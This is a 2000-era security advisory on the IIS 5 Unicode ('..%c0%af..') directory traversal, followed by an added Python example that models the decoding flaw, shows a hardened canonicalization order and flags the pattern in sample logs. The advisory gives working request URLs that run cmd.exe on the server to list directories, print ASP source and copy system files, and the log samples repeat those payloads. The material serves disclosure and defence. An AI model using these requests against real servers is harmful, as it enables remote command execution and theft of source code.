______________________________________________________________________
NtWaK0 Bug / Security / Advisory
Saturday, October 21, 2000

IIS 5 and using ..%c0%af../winnt/system32/cmd.exe?/c+type+c:
to read any ASP source code on the server
______________________________________________________________________

o Synopsis

Based on http://www.wiretrip.net/rfp/p/doc.asp?id=57&iface=2 I did some
research and found that ..%c0%af.. can be used to do more than just a
directory listing :)

RISK FACTOR: HIGH
______________________________________________________________________

o Vulnerable Systems

IIS 5.0
Maybe IIS 4 as well; I did not check it.
______________________________________________________________________

o Vulnerability Information

What I tried was reading ASP source code, and I was able to do it using
this syntax (the first request lists the directory, the second returns
the file):

http://IPADDRESSTESTED/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\inetpub\wwwroot\home\*.*
http://IPADDRESSTESTED/scripts/..%c0%af../winnt/system32/cmd.exe?/c+type+c:\inetpub\wwwroot\home\default.asp

And sure enough, here is (part of) the source code that came back:

  Dim sServerName, sLocalAddress, sRemoteAddress
  sServerName = Request.ServerVariables("SERVER_NAME")
  sLocalAddress = Request.ServerVariables("LOCAL_ADDR")
  sRemoteAddress = Request.ServerVariables("REMOTE_ADDR")
  %>

Now let us do more. You can save a file, for example:

http://IPADDRESSTESTED/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\boot.ini

You will be prompted whether you want to save the file or open it.

Next I did:

http://IPADDRESSTESTED/scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+c:\boot.ini+c:\bobo.ini

That gave me a different error:

  CGI Error
  The specified CGI application misbehaved by not returning a complete set
  of HTTP headers. The headers it did return are:
  c:\boot.ini
  The system cannot find the file specified.
  0 file(s) copied.
Hrm, interesting: the file is located in c:\boot.ini :) Note that cmd.exe
did run the copy command; only the copy itself failed ("0 file(s)
copied" in the output above). At this point I stopped working on it, but
clearly you can do more than a DIR LISTING.
______________________________________________________________________

o Resolution

Microsoft has released MS00-078 to warn of the problem. The patch from
MS00-057 ("File Permission Canonicalization") fixes this problem.
______________________________________________________________________

o Credits

The discovery of this vulnerability was made by Par Osterberg; some other
research was done by rain forest puppy and some by NtWaK0.
______________________________________________________________________
______________________________________________________________________

"The only secure computer is one that's unplugged, locked in a safe, and
buried 20 feet under the ground in a secret location... and I'm not even
too sure about that one." -- Dennis Hughes, FBI.
____________________________________________________________._________
Live Well Do Good | Accept no limitations
   \(|)/
 --(")--
  /`\
NtWaK0
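The Vulnerability Information section shows the requests but not why the traversal check lets `..%c0%af..` through, and the Resolution section names canonicalization as the fix without showing the ordering that matters. The Python below is an added example written for this page, not the advisory's, rfp's or Microsoft's code. It builds the overlong UTF-8 forms (`%c0%af` is a two-byte encoding of `/`, `%c1%9c` of `\`), models the flawed "check for `..` then decode" ordering beside the hardened "decode strictly, canonicalize, then check containment" ordering, and flags the pattern in IIS W3C-style log lines. `VIRTUAL_ROOT`, `SAMPLE_LOG` and all function names are assumptions constructed for the example; the log lines are made up, not captured traffic.

```python
"""Added example for this advisory: why ..%c0%af.. gets past an IIS-style
traversal check, how strict decoding plus canonicalization stops it, and how
to spot the pattern in logs.  VIRTUAL_ROOT, SAMPLE_LOG and every name below
are constructed for the example, not taken from IIS internals."""
import posixpath
from urllib.parse import unquote_to_bytes

VIRTUAL_ROOT = "/inetpub"  # assumption: URL paths are mapped under this root

def overlong_utf8(cp: int, length: int) -> bytes:
    """Non-shortest (overlong) UTF-8 for an ASCII code point.  RFC 3629 forbids
    these forms; the vulnerable decoder accepted them ('/' -> c0 af, '\\' -> c1 9c)."""
    if not 0 <= cp < 0x80 or length not in (2, 3):
        raise ValueError("ASCII code point and length 2 or 3 only")
    if length == 2:
        return bytes([0xC0 | (cp >> 6), 0x80 | (cp & 0x3F)])
    return bytes([0xE0, 0x80 | ((cp >> 6) & 0x3F), 0x80 | (cp & 0x3F)])

def lenient_utf8_decode(data: bytes) -> str:
    """Decoder that accepts overlong forms, modelling the flawed behaviour.
    It does not validate continuation bytes; it only has to exhibit the bug."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b)); i += 1
        elif 0xC0 <= b < 0xE0 and i + 1 < len(data):
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F))); i += 2
        elif 0xE0 <= b < 0xF0 and i + 2 < len(data):
            cp = ((b & 0x0F) << 12) | ((data[i + 1] & 0x3F) << 6) | (data[i + 2] & 0x3F)
            out.append(chr(cp)); i += 3
        else:
            out.append("\ufffd"); i += 1
    return "".join(out)

def strict_utf8_decode(data: bytes):
    """Python's codec rejects overlong sequences; None means malformed input."""
    try:
        return data.decode("utf-8")
    except UnicodeDecodeError:
        return None

def resolve(decoded_path: str) -> str:
    """Map a decoded URL path under the virtual root and canonicalize it,
    treating backslashes as separators the way Windows does."""
    rel = decoded_path.replace("\\", "/").lstrip("/")
    return posixpath.normpath(posixpath.join(VIRTUAL_ROOT, rel))

def inside_root(full: str) -> bool:
    return full == VIRTUAL_ROOT or full.startswith(VIRTUAL_ROOT + "/")

def vulnerable_server_path(url_path: str):
    """Flawed order: look for a '..' segment in the percent-decoded bytes, THEN
    decode leniently.  At check time '..%c0%af..' is one opaque segment."""
    raw = unquote_to_bytes(url_path)
    if b".." in raw.replace(b"\\", b"/").split(b"/"):
        return "blocked", None
    return "allowed", resolve(lenient_utf8_decode(raw))

def hardened_server_path(url_path: str):
    """Fixed order: strict decode, canonicalize, then check containment."""
    decoded = strict_utf8_decode(unquote_to_bytes(url_path))
    if decoded is None:
        return "rejected: invalid utf-8", None
    full = resolve(decoded)
    if not inside_root(full):
        return "rejected: outside root", None
    return "allowed", full

# Constructed IIS W3C-style lines: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2000-10-21 10:01:12 10.0.0.5 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir+c:\\ 200
2000-10-21 10:01:30 10.0.0.5 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+type+c:\\inetpub\\wwwroot\\home\\default.asp 200
2000-10-21 10:02:02 10.0.0.9 GET /home/default.asp - 200
2000-10-21 10:02:40 10.0.0.5 GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+dir+c:\\ 200
2000-10-21 10:03:15 10.0.0.7 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 404
"""

def suspicious_log_lines(log_text: str):
    """(line_no, reason) for each cs-uri-stem that is malformed UTF-8 or whose
    canonical path leaves the virtual root, whatever status the server logged."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        fields = line.split()
        if len(fields) < 5:
            continue
        decoded = strict_utf8_decode(unquote_to_bytes(fields[4]))
        if decoded is None:
            hits.append((n, "overlong/invalid UTF-8 in cs-uri-stem"))
        elif not inside_root(resolve(decoded)):
            hits.append((n, "canonical path escapes root"))
    return hits
```

Calling `vulnerable_server_path("/scripts/..%c0%af../winnt/system32/cmd.exe")` returns `("allowed", "/winnt/system32/cmd.exe")` because the segment `..%c0%af..` is not literally `..` when the check runs, while the same request through `hardened_server_path` is rejected as invalid UTF-8 and the plain `..%2f..` variant is rejected as outside the root. The detector treats any non-shortest-form encoding as hostile rather than matching on `%c0%af` alone, so it also catches `%c1%9c` and the three-byte `%e0%80%af` form without a signature list.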